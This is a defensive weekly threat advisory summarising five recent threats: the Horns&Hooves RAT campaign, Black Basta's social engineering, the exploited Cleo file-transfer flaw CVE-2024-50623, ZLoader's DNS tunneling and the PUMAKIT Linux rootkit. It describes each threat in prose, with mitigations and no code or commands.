Black Basta Ransomware Adopts Sophisticated Social Engineering Tactics

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the discovery of the advanced PUMAKIT Linux rootkit, which uses stealth techniques, privilege escalation, and syscall hooking to evade detection and maintain persistence on targeted systems. Researchers have also reported the resurgence of ZLoader malware with version 2.9.4.0, featuring DNS tunneling for encrypted C2 communications. Another critical development is the active exploitation of a vulnerability (CVE-2024-50623) in Cleo’s managed file transfer software, allowing unauthenticated remote code execution to deploy ransomware like Termite. Meanwhile, the Horns&Hooves malware campaign continues to target users in Russia with malicious JavaScript files delivered via phishing emails, deploying NetSupport RAT for remote control and facilitating further malware infections. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Malware Uses JavaScript and ZIP Attachments to Deploy NetSupport RAT

The Horns&Hooves malware campaign, active since March 2023, has been targeting private users, retailers, and businesses in Russia through sophisticated phishing emails. These emails contain ZIP attachments with malicious JavaScript files that mimic legitimate business correspondence to deploy NetSupport RAT and BurnsRAT, enabling remote system control and command execution. Researchers have observed advanced obfuscation techniques, such as disguising malicious scripts as legitimate software, allowing the malware to evade detection effectively. The infection chain often leads to the installation of additional stealers like Rhadamanthys and Meduza, increasing the risk of data theft and ransomware attacks.

To mitigate this threat, organizations should train employees to identify phishing emails and block suspicious ZIP attachments. Deploying robust antivirus tools is essential to detect unauthorized activities, such as the use of BITSAdmin or curl for downloading malicious payloads. Network monitoring should focus on restricting outbound traffic to untrusted domains and identifying suspicious C2 communication. In the event of compromise, systems should be isolated promptly, and endpoint analysis should be performed to prevent further damage.

2. Black Basta Ransomware Adopts Sophisticated Social Engineering Tactics

The Black Basta ransomware group has evolved its tactics, incorporating advanced social engineering techniques such as email bombing and impersonating IT personnel to manipulate users into installing legitimate remote access tools like AnyDesk, TeamViewer, or Quick Assist. In some cases, attackers initiate communication via Microsoft Teams, presenting themselves as trusted IT staff. Once access is granted, the group deploys malware such as Zbot (ZLoader), DarkGate, and custom tools to harvest credentials, enumerate environments, and bypass MFA protections for deeper infiltration. Emerging in 2022 from the remnants of Conti, Black Basta has adopted a hybrid malware dissemination model, combining botnets with social engineering strategies to expand its reach. 

The group’s tactics extend to using tools like the OpenSSH client for reverse shells and distributing malicious QR codes to steal credentials or redirect victims to compromised infrastructure. Leveraging bespoke malware such as KNOTWRAP, KNOTROCK, and DAWNCRY, along with utilities like PORTYARD and COGSCAN, Black Basta has demonstrated an ability to exploit trusted channels and tools for sophisticated attacks. Organizations must mitigate these threats by implementing robust spam filters, restricting unauthorized remote access tools, enforcing MFA, monitoring for anomalous activities, and educating employees to recognize social engineering techniques, such as impersonation or QR code phishing. Effective vulnerability management, network traffic monitoring, and strict access controls remain critical to minimizing the risk of compromise.

3. CVE-2024-50623: Critical Vulnerability in Cleo Software Exploited for Mass RCE

A critical vulnerability (CVE-2024-50623) in Cleo’s managed file transfer solutions—Harmony, VLTrader, and LexiCom—has been actively exploited since December 3, 2024, allowing unauthenticated remote code execution. The flaw arises from an unrestricted file upload mechanism, enabling attackers to drop malicious files into the “autorun” directory. This triggers embedded PowerShell commands, which retrieve further malware like Java Archive (JAR) files from remote servers. Notably, attackers have leveraged this vulnerability to deploy Termite ransomware, a modified variant of Babuk ransomware, encrypting files with a .termite extension. 

The exploitation surged on December 8, 2024, targeting industries such as consumer goods, logistics, and food supply. Security researchers confirmed that exposed Cleo servers, discoverable through Shodan, were key entry points. Despite advisories and partial patches issued by Cleo, the vulnerability remains under active exploitation. Immediate mitigations include restricting internet exposure to Cleo servers, monitoring critical directories for unauthorized uploads, and isolating Cleo systems from sensitive networks. Organizations must also deploy EDR tools to detect suspicious PowerShell activity, maintain offline backups for quick recovery, and promptly apply patches to prevent further ransomware attacks.

4. ZLoader Evolves with Stealthy DNS Tunneling for Command Control

The ZLoader malware has resurfaced with version 2.9.4.0, introducing advanced capabilities such as a DNS tunneling protocol for encrypted command-and-control (C2) communication and an interactive shell for executing binaries, DLLs, and shellcode. Originally based on the Zeus banking trojan, ZLoader has evolved with sophisticated anti-analysis techniques, including environment checks, API import resolution, and a Domain Generation Algorithm (DGA) to ensure resilience against detection. These advancements allow it to bypass traditional security systems effectively while supporting data exfiltration and process termination. 

ZLoader’s resurgence has been linked to Black Basta ransomware attacks, where multi-stage infection chains leverage Remote Monitoring and Management (RMM) tools like AnyDesk, TeamViewer, and Microsoft Quick Assist. Small-scale, targeted campaigns, often enabled by initial access brokers, highlight its shift from widespread attacks to precision-based operations. 

To counter this threat, organizations must monitor DNS traffic for tunneling anomalies and enforce strict controls on RMM tool usage, paired with multifactor authentication. Proactive endpoint hardening, user awareness training to identify phishing and impersonation tactics, and robust incident response plans are critical. Additionally, security tools must be updated regularly to detect ZLoader’s anti-analysis techniques, while network segmentation can contain lateral movement and limit malware spread.

5. Advanced Linux Rootkit Leveraging Stealth and Privilege Escalation Techniques

PUMAKIT is a newly identified Linux rootkit that employs advanced stealth techniques, privilege escalation, and syscall hooking to evade detection and maintain persistence on targeted systems. PUMAKIT operates as a Loadable Kernel Module (LKM) rootkit, leveraging Linux’s internal function tracer (ftrace) to intercept and manipulate system functions such as prepare_creds and commit_creds. This sophisticated malware features a multi-stage infection chain involving a dropper, two memory-resident executables (memfd:tgt and memfd:wpn), and the LKM rootkit (puma.ko), alongside a shared object userland rootkit named Kitsune. 

The dropper uses an unmodified Cron binary to load subsequent malware stages, while the rootkit hooks into 18 system calls, including abusing the rmdir() syscall for privilege escalation. PUMAKIT activates only under specific conditions, such as secure boot checks or kernel symbol availability, ensuring stealth and precision. By using memory-resident files and advanced syscall manipulation, the malware maintains persistence and evades detection by traditional monitoring tools.

To mitigate the risk, organizations should harden kernels with strict module loading policies, enable secure boot, and deploy tools like Auditd to monitor syscall usage for anomalies. File integrity monitoring solutions, should be implemented to detect unauthorized changes, while runtime memory protection can block memory-resident malware. Regular updates, network segmentation, and minimal privilege enforcement further reduce exposure. Lastly, robust incident response plans and behavioral analysis tools are essential for detecting and responding swiftly to rootkit infections.